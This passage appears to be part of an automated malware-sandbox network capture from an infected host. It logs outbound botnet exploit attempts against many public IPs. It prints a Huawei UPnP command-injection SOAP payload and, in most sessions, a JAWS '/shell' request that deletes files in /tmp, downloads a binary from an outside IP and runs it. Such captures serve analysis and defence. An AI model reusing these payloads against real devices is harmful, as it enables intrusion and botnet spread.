                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          182192.168.2.235283049.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:17.117268085 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 31 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:16Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          183192.168.2.233304420.94.161.14580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:17.563870907 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          184192.168.2.2348452173.255.250.6180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:17.602391005 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:17.772706032 CET321INHTTP/1.1 400 Bad Request
                                                          Server: nginx/1.24.0
                                                          Date: Tue, 02 Jan 2024 05:24:17 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 157
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          185192.168.2.234000252.222.57.8380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:17.613377094 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          186192.168.2.233518862.202.156.24180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:17.662475109 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          187192.168.2.235290891.194.11.19180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:17.758398056 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:17.914313078 CET474INHTTP/1.1 301 Moved Permanently
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Tue, 02 Jan 2024 05:24:17 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Data Raw: 62 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: b2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          188192.168.2.2346628172.245.174.8080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:17.912872076 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:18.067378998 CET404INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:17 GMT
                                                          Server: Apache
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          189192.168.2.235788250.19.25.18880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:17.916928053 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:18.076217890 CET401INHTTP/1.1 301 Moved Permanently
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jan 2024 05:24:18 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 134
                                                          Connection: keep-alive
                                                          Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          190192.168.2.2348736193.233.164.23780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:17.936240911 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:18.175506115 CET338INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Tue, 02 Jan 2024 05:24:18 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          191192.168.2.235630423.198.222.19280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:18.028834105 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:18.299593925 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:24:18 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:18 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 30 66 62 64 32 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 30 35 38 26 23 34 36 3b 64 61 63 62 62 30 39 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;50fbd217&#46;1704173058&#46;dacbb099</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          192192.168.2.233769485.221.227.12480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:18.042373896 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          193192.168.2.235012637.32.125.6180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:18.097501040 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:18.402854919 CET443INHTTP/1.1 403 Forbidden
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Content-Length: 337
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 36 22 3e 3c 74 69 74 6c 65 3e 4e 54 45 32 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 31 30 2e 31 30 2e 33 34 2e 33 36 2f 3f 74 79 70 65 3d 49 6e 76 61 6c 69 64 20 4b 65 79 77 6f 72 64 26 70 6f 6c 69 63 79 3d 4d 61 69 6e 50 6f 6c 69 63 79 20 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 76 73 70 61 63 65 3d 22 30 22 20 68 73 70 61 63 65 3d 22 30 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256"><title>NTE2</title></head><body><iframe src="http://10.10.34.36/?type=Invalid Keyword&policy=MainPolicy " style="width: 100%; height: 100%" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" vspace="0" hspace="0"></iframe></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          194192.168.2.235848889.116.58.16280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:18.153620958 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:18.414053917 CET932INHTTP/1.1 400 Bad Request
                                                          Connection: close
                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                          pragma: no-cache
                                                          content-type: text/html
                                                          content-length: 681
                                                          date: Tue, 02 Jan 2024 05:24:18 GMT
                                                          server: LiteSpeed
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          195192.168.2.234072423.77.132.17780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:18.209402084 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:18.506181002 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:24:18 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:18 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 64 31 64 64 30 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 30 35 38 26 23 34 36 3b 32 64 39 62 31 35 37 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;ad1dd017&#46;1704173058&#46;2d9b157d</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          196192.168.2.2347340186.132.17.22380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:18.726815939 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:19.010334015 CET424INData Raw: 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6d 69 63 72 6f 5f 68 74 74 70 64 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 30
                                                          Data Ascii: 157.90.250.90/jaws;sh+/tmp/jaws 400 Bad RequestServer: micro_httpdDate: Tue, 02 Jan 2024 05:24:16 GMTConnection: keep-aliveKeep-Alive: timeout=60, max=1000Content-Type: text/htmlContent-Security-Policy: default-src 'self'; frame-an


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          197192.168.2.2335930106.14.41.17480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:18.753228903 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:19.059973001 CET306INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:18 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          198192.168.2.233666091.242.215.20480
                                                          TimestampBytes transferredDirectionData
